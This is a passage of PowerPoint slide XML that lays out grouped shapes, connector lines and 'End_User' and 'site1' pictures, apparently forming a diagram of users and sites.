              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36033"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34"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035"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69" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36030"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31"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32"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025"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26"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27"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28"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29"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70" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="13241838" y="3026096"/>
            <a:ext cx="313333" cy="269557"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="271" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36020"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21"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022"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76" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36017"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18"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19"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012"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13"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14"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15"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16"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="277" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="12776124" y="1510666"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="278" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36007"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08"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009"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79" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36004"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005"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06"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5999"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00"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01"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02"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003"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80" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="12821840" y="1591630"/>
            <a:ext cx="313331" cy="269557"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="281" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35994"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95"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5996"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82" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35991"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92"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93"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5986"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87"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88"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89"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90"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="283" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11011375" y="5549266"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="284" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35981"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82"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5983"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85" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35978"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79"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80"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5973"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4"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5"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6"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7"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86" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11057087" y="5630230"/>
            <a:ext cx="313333" cy="269557"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="287" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35968" name="Line 372"/>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69" name="Oval 373"/>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5970" name="Oval 374"/>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322" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35965" name="Line 376"/>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66" name="Oval 377"/>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67" name="Oval 378"/>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5960" name="Oval 379"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="99" y="2943"/>
              <a:ext cx="48"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61" name="Oval 380"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="82" y="2901"/>
              <a:ext cx="83" cy="83"/>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62" name="Oval 381"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="9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63" name="Oval 382"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="129" y="2929"/>
              <a:ext cx="21" cy="2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64" name="Line 383"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="98" y="2984"/>
              <a:ext cx="51" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8544717" y="5815966"/>
            <a:ext cx="287618" cy="1615440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2390" y="752"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2390" h="752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2390" y="752"/>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53" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9026620" y="5835970"/>
            <a:ext cx="2060942" cy="963930"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2390" y="752"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2390" h="752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2390" y="752"/>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54" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4006646" y="5868353"/>
            <a:ext cx="2210464" cy="931546"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2390" y="752"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2390" h="752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2390" y="752"/>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55" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11013277" y="3782380"/>
            <a:ext cx="1420946" cy="956310"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2390" y="752"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2390" h="752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2390" y="752"/>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56" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8344720" y="1596392"/>
            <a:ext cx="490474" cy="1055370"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2390" y="752"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2390" h="752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2390" y="752"/>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58" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8893286" y="2161223"/>
            <a:ext cx="1845706" cy="415290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2390" y="752"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2390" h="752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2390" y="752"/>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59" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4920926" y="2061210"/>
            <a:ext cx="1063805" cy="632460"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2390" y="752"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2390" h="752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2390" y="752"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="35910" name="Picture 35" descr="End_User"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10863754" y="6453190"/>
            <a:ext cx="666662" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36323" name="Group 545"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10697089" y="6290310"/>
            <a:ext cx="982853" cy="982980"/>
            <a:chOff x="19770438" y="6161089"/>
            <a:chExt cx="3879272" cy="3879272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35956" name="Picture 546" descr="End_User-green.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="19770438" y="6161089"/>
              <a:ext cx="3879272" cy="3879272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35957" name="Picture 547" descr="site1.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="20393891" y="6774874"/>
              <a:ext cx="2743200" cy="2743200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35912" name="Picture 35" descr="End_User"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8144720" y="7118033"/>
            <a:ext cx="666662" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36335" name="Group 542"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7970435" y="6955157"/>
            <a:ext cx="983805" cy="983933"/>
            <a:chOff x="19770438" y="6161089"/>
            <a:chExt cx="3879272" cy="3879272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35954" name="Picture 543" descr="End_User-green.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="19770438" y="6161089"/>
              <a:ext cx="3879272" cy="3879272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35955" name="Picture 544" descr="site1.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="20393891" y="6774874"/>
              <a:ext cx="2743200" cy="2743200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35914" name="Picture 35" descr="End_User"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3484746" y="6371273"/>
            <a:ext cx="666662" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36336" name="Group 539"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3316174" y="6207443"/>
            <a:ext cx="983805" cy="982980"/>
            <a:chOff x="19770438" y="6161089"/>
            <a:chExt cx="3879272" cy="3879272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35952" name="Picture 540" descr="End_User-green.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="19770438" y="6161089"/>
              <a:ext cx="3879272" cy="3879272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35953" name="Picture 541" descr="site1.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="20393891" y="6774874"/>
              <a:ext cx="2743200" cy="2743200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35916" name="Picture 35" descr="End_User"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4619978" y="1572580"/>
            <a:ext cx="666662" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36348" name="Group 523"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4455217" y="1410653"/>
            <a:ext cx="982853" cy="982980"/>
            <a:chOff x="19770438" y="6161089"/>
            <a:chExt cx="3879272" cy="3879272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35950" name="Picture 524" descr="End_User-green.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="19770438" y="6161089"/>
              <a:ext cx="3879272" cy="3879272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35951" name="Picture 525" descr="site1.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="20393891" y="6774874"/>
              <a:ext cx="2743200" cy="2743200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35918" name="Picture 35" descr="End_User"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8105674" y="1153480"/>
            <a:ext cx="666662" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36349" name="Group 526"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
